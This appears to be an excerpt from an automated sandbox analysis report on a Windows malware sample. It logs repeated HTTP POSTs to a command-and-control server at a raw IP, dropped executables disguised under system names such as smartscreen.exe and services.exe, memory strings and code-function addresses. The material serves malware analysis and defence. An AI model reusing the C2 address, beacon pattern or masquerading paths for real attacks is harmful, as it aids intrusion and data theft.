                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2596Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 1876Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 1864Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownTCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknownHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: powershell.exe, 00000018.00000002.3283628819.0000021BC69D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                            Source: powershell.exe, 00000013.00000002.3295250062.000001A8F1EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoS
                            Source: svchost.exe, 0000002D.00000003.1868495517.000002A23E418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.45.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                            Source: svchost.exe, 0000002D.00000003.1868495517.000002A23E418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                            Source: qmgr.db.45.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                            Source: qmgr.db.45.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                            Source: qmgr.db.45.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                            Source: svchost.exe, 0000002D.00000003.1868495517.000002A23E418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.45.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                            Source: qmgr.db.45.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                            Source: qmgr.db.45.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                            Source: powershell.exe, 00000013.00000002.2943449790.000001A890078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3049842773.000001B7555E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3016378248.0000021BBE617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3061501750.00000187239B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 0000001A.00000002.1856432912.0000018713B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000013.00000002.1840605752.000001A880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1864124040.000001B745799000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1855678251.0000022355749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1857025753.0000021BAE7C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1856432912.0000018713B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000002.1718805809.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1840605752.000001A880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1864124040.000001B745571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1855678251.0000022355521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1857025753.0000021BAE5A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1856432912.0000018713941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000013.00000002.1840605752.000001A880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1864124040.000001B745799000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1855678251.0000022355749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1857025753.0000021BAE7C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1856432912.0000018713B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 0000001A.00000002.1856432912.0000018713B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000013.00000002.3273090808.000001A8F1E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t.com/pk
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: powershell.exe, 00000013.00000002.1840605752.000001A880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1864124040.000001B745571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1855678251.0000022355521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1857025753.0000021BAE5A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1856432912.0000018713941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: powershell.exe, 0000001A.00000002.3061501750.00000187239B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000001A.00000002.3061501750.00000187239B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000001A.00000002.3061501750.00000187239B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: qmgr.db.45.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                            Source: svchost.exe, 0000002D.00000003.1868495517.000002A23E40E000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.45.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                            Source: qmgr.db.45.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                            Source: qmgr.db.45.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                            Source: powershell.exe, 0000001A.00000002.1856432912.0000018713B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000013.00000002.2943449790.000001A890078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3049842773.000001B7555E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3016378248.0000021BBE617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3061501750.00000187239B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: qmgr.db.45.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exeJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Windows\Vss\Writers\Application\66bd154ce6dd3fJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC63445EDF6B1F4E2FAF4EDB3743FA6EFB.TMPJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC63445EDF6B1F4E2FAF4EDB3743FA6EFB.TMPJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeCode function: 0_2_00007FFD9B890DA00_2_00007FFD9B890DA0
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeCode function: 0_2_00007FFD9BA53B370_2_00007FFD9BA53B37
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeCode function: 0_2_00007FFD9BA5522F0_2_00007FFD9BA5522F
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeCode function: 0_2_00007FFD9BA911900_2_00007FFD9BA91190
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeCode function: 0_2_00007FFD9BA551670_2_00007FFD9BA55167
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeCode function: 0_2_00007FFD9BA54EC90_2_00007FFD9BA54EC9
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeCode function: 0_2_00007FFD9BA4063B0_2_00007FFD9BA4063B
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeCode function: 0_2_00007FFD9BA55D600_2_00007FFD9BA55D60
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD9B9630E922_2_00007FFD9B9630E9
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeCode function: 44_2_00007FFD9B8B0DA044_2_00007FFD9B8B0DA0
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeCode function: 46_2_00007FFD9B880DA046_2_00007FFD9B880DA0
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 49_2_00007FFD9B8CAEFD49_2_00007FFD9B8CAEFD
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 49_2_00007FFD9B8CC44A49_2_00007FFD9B8CC44A
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 49_2_00007FFD9B8CA26349_2_00007FFD9B8CA263
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 49_2_00007FFD9B90416449_2_00007FFD9B904164
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 49_2_00007FFD9B8F91CD49_2_00007FFD9B8F91CD
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 49_2_00007FFD9B9093F049_2_00007FFD9B9093F0
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 49_2_00007FFD9B902A1849_2_00007FFD9B902A18
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 49_2_00007FFD9B8B0DA049_2_00007FFD9B8B0DA0
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 49_2_00007FFD9B8BF36C49_2_00007FFD9B8BF36C
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 49_2_00007FFD9B8BCE9D49_2_00007FFD9B8BCE9D
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 49_2_00007FFD9B8C6F9849_2_00007FFD9B8C6F98
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeCode function: 50_2_00007FFD9B8BEC3950_2_00007FFD9B8BEC39
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeCode function: 50_2_00007FFD9B8BCE9D50_2_00007FFD9B8BCE9D
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeCode function: 50_2_00007FFD9B90416450_2_00007FFD9B904164
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeCode function: 50_2_00007FFD9B8F91CD50_2_00007FFD9B8F91CD
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeCode function: 50_2_00007FFD9B9093F050_2_00007FFD9B9093F0
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeCode function: 50_2_00007FFD9B902A1850_2_00007FFD9B902A18
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeCode function: 50_2_00007FFD9B8C6F9850_2_00007FFD9B8C6F98
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeCode function: 50_2_00007FFD9B8B0DA050_2_00007FFD9B8B0DA0
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeCode function: 50_2_00007FFD9B8CAEFD50_2_00007FFD9B8CAEFD
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeCode function: 50_2_00007FFD9B8CC44A50_2_00007FFD9B8CC44A
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeCode function: 50_2_00007FFD9B8CA26350_2_00007FFD9B8CA263
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeCode function: 51_2_00007FFD9B8E416451_2_00007FFD9B8E4164
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeCode function: 51_2_00007FFD9B8D91CD51_2_00007FFD9B8D91CD
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeCode function: 51_2_00007FFD9B8E93F051_2_00007FFD9B8E93F0
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeCode function: 51_2_00007FFD9B8E2A1851_2_00007FFD9B8E2A18
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeCode function: 51_2_00007FFD9B8A6F9851_2_00007FFD9B8A6F98
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeCode function: 51_2_00007FFD9B89EC3951_2_00007FFD9B89EC39
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeCode function: 51_2_00007FFD9B89CE9D51_2_00007FFD9B89CE9D
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeCode function: 51_2_00007FFD9B8AAEFD51_2_00007FFD9B8AAEFD
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeCode function: 51_2_00007FFD9B8AA26351_2_00007FFD9B8AA263
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeCode function: 51_2_00007FFD9B890DA051_2_00007FFD9B890DA0
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeCode function: 52_2_00007FFD9B8A0DA052_2_00007FFD9B8A0DA0
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 53_2_00007FFD9B89AEFD53_2_00007FFD9B89AEFD
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 53_2_00007FFD9B89C44A53_2_00007FFD9B89C44A
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 53_2_00007FFD9B89A26353_2_00007FFD9B89A263
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 53_2_00007FFD9B8D416453_2_00007FFD9B8D4164
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 53_2_00007FFD9B8C91CD53_2_00007FFD9B8C91CD
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 53_2_00007FFD9B8D93F053_2_00007FFD9B8D93F0
